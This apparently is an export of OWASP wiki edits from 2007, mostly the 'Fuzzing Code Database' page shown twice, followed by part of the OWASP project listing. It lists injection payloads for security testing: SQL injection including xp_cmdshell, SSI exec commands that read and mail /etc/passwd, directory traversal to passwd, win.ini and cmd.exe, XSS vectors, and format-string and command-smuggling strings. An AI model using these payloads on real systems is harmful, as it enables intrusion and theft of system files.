<!--#exec cmd="mail Foobar@email.de <mailto:Foobar@email.de> < cat /etc/passwd" --><br/><br />
<br />
</pre><br />
<br />
<br />
=== Directory Traversal Statements ===<br />
<br />
<pre><br />
<br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
<br />
</pre><br />
<br />
=== XSS Statements ===<br />
<br />
<pre><br />
<br />
<a href="javas&#99;ript&#35;[code]"><br />
<a href="javas&#99;ript&#35;[code]"><br />
<div onmouseover="[code]"><br />
<img src="javascript:[code]"><br />
<img dynsrc="javascript:[code]"><br />
<input type="image" dynsrc="javascript:[code]"><br />
<bgsound src="javascript:[code]"><br />
&<script>[code]</script><br />
&{[code]};<br />
<img src=&{[code]};><br />
<link rel="stylesheet" href="javascript:[code]"><br />
<iframe src="vbscript:[code]"><br />
<img src="mocha:[code]"><br />
<img src="livescript:[code]"><br />
<a href="about:<s&#99;ript>[code]</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:[code]"><br />
<body onload="[code]"><br />
<div style="background-image: url(javascript:[code]);"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"><br />
<div style="width: expression([code]);"><br />
<style type="text/javascript">[code]</style><br />
<object classid="clsid:..." codebase="javascript:[code]"><br />
<style><!--</style><script>[code]//--></script><br />
<![CDATA[<!--]]><script>[code]//--></script><br />
<!-- -- --><script>[code]</script><!-- -- --><br />
<<script>[code]</script><br />
<img src="blah"onmouseover="[code]"><br />
<img src="blah>" onmouseover="[code]"><br />
<xml src="javascript:[code]"><br />
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
<a href="javas&#99;ript&#35;[code]"><br />
<div onmouseover="[code]"><br />
<img src="javascript:[code]"><br />
<img dynsrc="javascript:[code]"><br />
<input type="image" dynsrc="javascript:[code]"><br />
<bgsound src="javascript:[code]"><br />
&<script>[code]</script><br />
&{[code]};<br />
<img src=&{[code]};><br />
<link rel="stylesheet" href="javascript:[code]"><br />
<iframe src="vbscript:[code]"><br />
<img src="mocha:[code]"><br />
<img src="livescript:[code]"><br />
<a href="about:<s&#99;ript>[code]</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:[code]"><br />
<body onload="[code]"><br />
<div style="background-image: url(javascript:[code]);"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"> [Mozilla]<br />
<div style="width: expression([code]);"><br />
<style type="text/javascript">[code]</style><br />
<object classid="clsid:..." codebase="javascript:[code]"><br />
<style><!--</style><script>[code]//--></script><br />
<![CDATA[<!--]]><script>[code]//--></script><br />
<!-- -- --><script>[code]</script><!-- -- --><br />
<<script>[code]</script><br />
<img src="blah"onmouseover="[code]"><br />
<img src="blah>" onmouseover="[code]"><br />
<xml src="javascript:[code]"><br />
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> <br />
<br />
</pre><br />
<br />
=== Format String Statements ===<br />
<br />
<pre><br />
<br />
%s%p%x%d<br />
.1024d<br />
%.2049d<br />
%p%p%p%p<br />
%x%x%x%x<br />
%d%d%d%d<br />
%s%s%s%s<br />
%99999999999s<br />
%08x<br />
%%20d<br />
%%20n<br />
%%20x<br />
%%20s<br />
%s%s%s%s%s%s%s%s%s%s<br />
%p%p%p%p%p%p%p%p%p%p<br />
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%<br />
f(x)=%s x 123<br />
f(x)=%x x 255<br />
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x<br />
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s<br />
XXXXX.%p<br />
XXXXX`perl -e 'print ".%p" x 80'`<br />
`perl -e 'print ".%p" x 80'`%n<br />
%08x.%08x.%08x.%08x.%08x\n<br />
XXX0_%08x.%08x.%08x.%08x.%08x\n<br />
%.16705u%2\$hn<br />
\x10\x01\x48\x08_%08x.%08x.%08x.%08x.%08x|%s|<br />
;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;id > /tmp/file; exit;<br />
<br />
</pre></div>
Foobar23
https://wiki.owasp.org/index.php?title=Category:OWASP_Fuzzing_Code_Database&diff=20475
Category:OWASP Fuzzing Code Database
2007-07-30T13:51:33Z
<p>Foobar23: First Edit</p>
<hr />
<div>This database is a collection of statements used in code injection software. All too often, security professionals rely on their own repositories of statements, collected from several projects over a long time. We want to collect all these statements and compose them, merging the databases of several projects like [[WebScarab]] and [[JBroFuzz]] to build a large dataset of effective statements that provides better testing results.<br />
Please add your own statements and check the statements already added. <br />
<br />
=== SQL Injection Statements ===<br />
<br />
<pre><br />
<br />
'sqlvuln<br />
'+sqlvuln<br />
sqlvuln;<br />
(sqlvuln)<br />
a' or 1=1--<br />
a" or 1=1--<br />
a" or "a" = "a<br />
a' or 'a' = 'a<br />
1 or 1=1<br />
a' waitfor delay '0:0:10'--<br />
1 waitfor delay '0:0:10'--<br />
declare @q nvarchar (4000) select @q =<br />
0x770061006900740066006F0072002000640065006C00610079002000270030003A0030003A<br />
0<br />
031003000270000<br />
declare @s varchar(22) select @s =<br />
0x77616974666F722064656C61792027303A303A31302700 exec(@s)<br />
declare @q nvarchar (4000) select @q =<br />
0x730065006c00650063007400200040004000760065007200730069006f006e00 exec(@q)<br />
declare @s varchar (8000) select @s = 0x73656c65637420404076657273696f6e<br />
exec(@s)<br />
a'<br />
?<br />
' or 1=1<br />
‘ or 1=1 --<br />
x' AND userid IS NULL; --<br />
x' AND email IS NULL; --<br />
anything' OR 'x'='x<br />
x' AND 1=(SELECT COUNT(*) FROM tabname); --<br />
x' AND members.email IS NULL; --<br />
x' OR full_name LIKE '%Bob%<br />
23 OR 1=1<br />
'; exec master..xp_cmdshell 'ping 172.10.1.255'--<br />
<br />
</pre><br />
<br />
=== SSI (Server Side Includes) Statements ===<br />
<br />
<pre><br />
<br />
<!--#exec cmd="/bin/ls /" --><br/><br />
<!--#exec cmd="cat /etc/passwd" --><br/><br />
<!--#exec cmd="find / -name *.* -print" --><br/><br />
<!--#exec cmd="mail Foobar@email.de < cat /etc/passwd" --><br/><br />
<br />
</pre><br />
<br />
<br />
=== Directory Traversal Statements ===<br />
<br />
<pre><br />
<br />
\..\WINDOWS\win.ini<br />
\..\..\WINDOWS\win.ini<br />
\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\WINDOWS\win.ini<br />
\..\..\..\..\..\..\WINDOWS\win.ini<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%2e%2e%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%5c%57%49%4e%44%4f%57%53%5c%77%69%6e%2e%69%6e%69<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%32%65%%32%65%%35%63%%35%37%%34%39%%34%65%%34%34%%34%66%%35%37%%35%33%%35%63%%37%37%%36%39%%36%65%%32%65%%36%39%%36%65%%36%39<br />
..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c../winnt/system32/cmd.exe?/c+dir+c:\<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
%2e%2e%2f%77%69%6e%6e%74%2f%73%79%73%74%65%6d%33%32%2f%63%6d%64%2e%65%78%65%3f%2f%63%2b%64%69%72%2b%63%3a%5c<br />
../../../../../../../../../etc/passwd<br />
../../../../../../../../etc/passwd<br />
../../../../../../../etc/passwd<br />
../../../../../../etc/passwd<br />
../../../../../etc/passwd<br />
../../../../etc/passwd<br />
../../../etc/passwd<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
<br />
</pre><br />
<br />
=== XSS Statements ===<br />
<br />
<pre><br />
<br />
<a href="javas&#99;ript&#35;[code]"><br />
<a href="javas&#99;ript&#35;[code]"><br />
<div onmouseover="[code]"><br />
<img src="javascript:[code]"><br />
<img dynsrc="javascript:[code]"><br />
<input type="image" dynsrc="javascript:[code]"><br />
<bgsound src="javascript:[code]"><br />
&<script>[code]</script><br />
&{[code]};<br />
<img src=&{[code]};><br />
<link rel="stylesheet" href="javascript:[code]"><br />
<iframe src="vbscript:[code]"><br />
<img src="mocha:[code]"><br />
<img src="livescript:[code]"><br />
<a href="about:<s&#99;ript>[code]</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:[code]"><br />
<body onload="[code]"><br />
<div style="background-image: url(javascript:[code]);"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"><br />
<div style="width: expression([code]);"><br />
<style type="text/javascript">[code]</style><br />
<object classid="clsid:..." codebase="javascript:[code]"><br />
<style><!--</style><script>[code]//--></script><br />
<![CDATA[<!--]]><script>[code]//--></script><br />
<!-- -- --><script>[code]</script><!-- -- --><br />
<<script>[code]</script><br />
<img src="blah"onmouseover="[code]"><br />
<img src="blah>" onmouseover="[code]"><br />
<xml src="javascript:[code]"><br />
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
<a href="javas&#99;ript&#35;[code]"><br />
<div onmouseover="[code]"><br />
<img src="javascript:[code]"><br />
<img dynsrc="javascript:[code]"><br />
<input type="image" dynsrc="javascript:[code]"><br />
<bgsound src="javascript:[code]"><br />
&<script>[code]</script><br />
&{[code]};<br />
<img src=&{[code]};><br />
<link rel="stylesheet" href="javascript:[code]"><br />
<iframe src="vbscript:[code]"><br />
<img src="mocha:[code]"><br />
<img src="livescript:[code]"><br />
<a href="about:<s&#99;ript>[code]</script>"><br />
<meta http-equiv="refresh" content="0;url=javascript:[code]"><br />
<body onload="[code]"><br />
<div style="background-image: url(javascript:[code]);"><br />
<div style="behaviour: url([link to code]);"><br />
<div style="binding: url([link to code]);"> [Mozilla]<br />
<div style="width: expression([code]);"><br />
<style type="text/javascript">[code]</style><br />
<object classid="clsid:..." codebase="javascript:[code]"><br />
<style><!--</style><script>[code]//--></script><br />
<![CDATA[<!--]]><script>[code]//--></script><br />
<!-- -- --><script>[code]</script><!-- -- --><br />
<<script>[code]</script><br />
<img src="blah"onmouseover="[code]"><br />
<img src="blah>" onmouseover="[code]"><br />
<xml src="javascript:[code]"><br />
<xml id="X"><a><b>&lt;script>[code]&lt;/script>;</b></a></xml><br />
<div datafld="b" dataformatas="html" datasrc="#X"></div><br />
[\xC0][\xBC]script>[code][\xC0][\xBC]/script> <br />
<br />
</pre></div>
Foobar23
https://wiki.owasp.org/index.php?title=Category:OWASP_Project&diff=20473
Category:OWASP Project
2007-07-30T13:23:13Z
<p>Foobar23: /* Alpha Status Projects */</p>
<hr />
<div>An OWASP project is a collection of related tasks that have a defined roadmap and team members. OWASP project leaders are responsible for defining the vision, roadmap, and tasks for the project. The project leader also promotes the project and builds the team.<br />
<br />
To propose a new project, please send an email to [mailto:owasp@owasp.org?subject=New_OWASP_Project_idea owasp@owasp.org]<br />
<br />
Every project has an associated mail list. You can view all the lists, examine their archives, and subscribe to any of them on the [http://lists.owasp.org/mailman/listinfo OWASP Project Mailing Lists] page.<br />
<br />
<br />
<br />
<br />
==Release Quality Projects==<br />
<br />
<table><tr><th width="50%">Tools</th><th>Documentation</th></tr><tr valign="top"><td><br />
<br />
; [[:Category:OWASP WebGoat Project|OWASP WebGoat Project]]<br />
: an online training environment for hands-on learning about application security<br />
<br />
; [[:Category:OWASP WebScarab Project|OWASP WebScarab Project]]<br />
: a tool for performing all types of security testing on web applications and web services<br />
<br />
</td><td><br />
<br />
; [[:Category:OWASP AppSec FAQ Project|OWASP AppSec FAQ Project]]<br />
: FAQ covering many application security topics<br />
<br />
; [[:Category:OWASP Guide Project|OWASP Guide Project]]<br />
: a massive document covering all aspects of web application and web service security<br />
<br />
; [[:Category:OWASP Legal Project|OWASP Legal Project]]<br />
: a project focused on contracting for secure software<br />
<br />
; [[:Category:OWASP Testing Project|OWASP Testing Guide]]<br />
: a project focused on application security testing procedures and checklists<br />
<br />
; [[:Category:OWASP Top Ten Project|OWASP Top Ten Project]]<br />
: an awareness document that describes the top ten web application security vulnerabilities<br />
<br />
<br />
</td></tr></table><br />
<br />
==Beta Status Projects==<br />
<br />
<table valign="top"><tr><th width="50%">Tools</th><th>Documentation</th></tr><tr valign="top"><td><br />
<br />
; [[:Category:OWASP CAL9000 Project|OWASP CAL9000 Project]]<br />
: a JavaScript based web application security testing suite<br />
<br />
; [[:Category:OWASP DirBuster Project|OWASP DirBuster Project]]<br />
: DirBuster is a multi-threaded Java application designed to brute-force directory and file names on web/application servers.<br />
<br />
; [[:Category:OWASP Encoding Project|OWASP Encoding Project]]<br />
: a project focused on the development of encoding best practices for web applications.<br />
<br />
; [[:Category:OWASP LAPSE Project|OWASP LAPSE Project]]<br />
: an Eclipse-based source-code static analysis tool for Java<br />
<br />
; [[:Category:OWASP Live CD Project|OWASP Live CD Project]]<br />
: a CD containing ready to use versions of application security analysis and testing tools<br />
<br />
; [[:Category:OWASP LiveCD Education Project|OWASP LiveCD Education Project]]<br />
: an educational supplement project containing tutorials, challenges and videos detailing the use of tools contained within the OWASP LiveCD - LabRat. <br />
<br />
; [[:Category:OWASP .NET Project|OWASP .NET Research]]<br />
: a project focused on helping .NET developers build secure applications<br />
<br />
; [[:Category:OWASP Pantera Web Assessment Studio Project|OWASP Pantera Web Assessment Studio Project]]<br />
: a project focused on combining automated capabilities with complete manual testing to get the best results<br />
<br />
; [[:Category:OWASP Sprajax Project|OWASP Sprajax Project]]<br />
: an open source black box security scanner used to assess the security of AJAX-enabled applications<br />
<br />
; [[:Category:OWASP SQLiX Project|OWASP SQLiX Project]]<br />
: a project focused on the development of SQLiX, a full Perl-based SQL scanner<br />
<br />
; [[:Category:OWASP WSFuzzer Project|OWASP WSFuzzer Project]]<br />
: a project focused on the development of WSFuzzer, a full Python-based Web Services SOAP fuzzer<br />
<br />
; [[ORG_%28Owasp_Report_Generator%29|OWASP Report Generator]]<br />
: a project giving security professionals a way to report and keep track of their projects<br />
<br />
; [[Owasp_SiteGenerator|OWASP Site Generator]]<br />
: a project allowing users to create dynamic sites for use in training, web application scanner testing, etc...<br />
<br />
; [[OWASP_Tiger|OWASP Tiger]]<br />
: OWASP Tiger is a Windows application originally intended for automating the process of testing various known ASP.NET security issues in hosted environments. However, it is much more versatile than that: it can help you construct and send HTTP requests, receive and analyze the responses, and match them against a set of conditions to produce alerts and notifications that something is wrong with the application(s) or service(s) being tested.<br />
<br />
; [[:Category:OWASP WeBekci Project|OWASP WeBekci Project]]<br />
